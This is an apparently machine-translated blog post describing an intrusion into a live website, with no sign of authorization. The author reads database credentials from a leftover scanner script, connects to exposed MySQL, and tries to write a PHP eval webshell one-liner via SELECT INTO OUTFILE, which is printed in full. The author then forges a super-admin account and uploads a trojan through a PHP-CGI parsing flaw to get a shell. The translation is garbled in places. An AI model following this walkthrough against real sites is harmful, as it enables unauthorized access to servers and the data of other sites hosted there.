IMCAFS

 Home

an interesting penetration test

Posted by trammel at 2020-03-15
all

Author: Damian

Selected book: Selenium 2 automation test practice

Activity address: free book in March

Recently, I met an interesting site in the practice of penetration test. I'd like to record it here, hoping to provide some basic ideas for Mengxin, who just entered the security circle like me.

When getting the domain name of the target site, the first work is definitely to carry out a series of information collection. For specific information collection and how to effectively collect, please refer to Google or Baidu.

For the sake of simplicity, I will only mention some site information that I will use.

First of all, the real IP address of the website is not hidden behind the CDN. You can directly view the side stations of the same IP address on the threadbook, which shows a total of 189!

When we see this number, it's heavy to be honest. Although we can get the permissions of our target station from many side stations, the servers running so many sites must be safe in terms of their protection measures and permission management.

After simply browsing the general content of the website, I found that the frequency of updating and using the website is relatively high, which also shows that the administrator's attention to the website is relatively OK.

It was found that the management background of the website was hidden. In a burst, Google hacking syntax and so on did not find the background directory.

OK, let's check the missed scan directly. The main use is awvs (you can also use other scanners, such as appscan, or some missed scan products of other security companies).

After a wave of scanning, no SQL injection or XSS cross station was found, but a phpcgi parsing vulnerability was found. Details:

http://www.hangge.com/blog/cache/detail_667.html

But if we can't find the way to upload files, then we can't exploit the vulnerability. It seems that we have to go into the background

By the way, I don't seem to believe in Ann

When trying to use a small tool to scan sensitive files, it was found that there was such a file / 1.php in the directory of the website

/1.php

After entering, it's like this:

Intuitively, there must be something wrong with this file.

Sure enough, this little script can traverse all directories and related feature files of the website

This file may have been uploaded to the server by the webmaster to detect the backdoor of webshell (uploaded the week before I found it), and I guess I forgot to delete it.

Try the quick scan directly, and it is found that it is a scanning mode to detect the characteristics of the back door.

Check the code directly and find that the following two files are the back door of one sentence,

The specific code is as follows:

Is it so easy to take it?

The kitchen knife is connected. I found it can be connected, but I can't execute any command

Because the PHP file is parsed normally, some functions may be disabled.

Continue to study the file / 1.php, and try to search for features -- > login

/1.php

Check the relevant code and learn that the website uses inspirecms

EmpireCMS

Can also get the website management background, this seems to be the default path of the Empire CMS, do not know why the scanner did not directly burst out..

When I came to the management background, I found that there was a limit on the number of logins in the background, and I didn't find a way to bypass it, so I quit.

After a brief look at the seebug platform, there are no vulnerabilities related to the new version

I almost forgot the "backdoor" file of 1. PHP. I found the database configuration file directly from the search results

1.php

Because the IP of the web server is open to 3306 port, try to use Navicat to connect. Luckily, connect directly.

Try Mysql to write a sentence directly and execute the SQL statement directly

select '<?php eval($_post[‘shell’]);?>' into outfile 'e:/wwwroot2018/xxx/web/testtest.php'

Return

[Err] 1045 - Access deniedfor user  

No authority..

Check the database table, find the administrator user name table, and find that the password has been encrypted,

No way. If you want to enter the background, you can only use the clear text password.

Locate the relevant code file according to the login background and find the encrypted function

MMP, this encryption is a little complicated

Copy this function directly. Create the following PHP file in the local environment and test the encrypted output of the password admin

OK, next, you can add users directly to the administrator table, and set the permissions to the highest, that is, super administrator permissions.

Backstage

Due to the PHP CGI parsing vulnerability in the website, we only need to upload one sentence of a TXT file, find the attachment to upload, and successfully upload one sentence of the txt file

Find the upload attachment module and upload a sentence directly. It is found that it is blocked

Upload the Trojan file directly without killing a sentence, and upload it successfully. The screenshot is as follows

Then the kitchen knife is directly connected

http://www.xxxx.cn/d/file/p/2018-03-15/c0f6a19e6fc7881e613f6df5a2ef1bbb.txt/1.php

As above, the kitchen knife can be connected, but it can't execute any command

Repeat the above guess: "because the PHP file can be parsed normally, it may be that the system has disabled some executed functions."

At this time, I thought of all kinds of PHP free Damascus, and took out the PHP free Damascus given by a big guy last week

Direct upload succeeded

Add the suffix of PHP to get the webshell

PS simply looked at the directory of the server, found the source code of dozens of websites, and the administrator was too careless.. Webshell deleted

This article is so far, I hope I can record more and share more with you in the future.

© 2023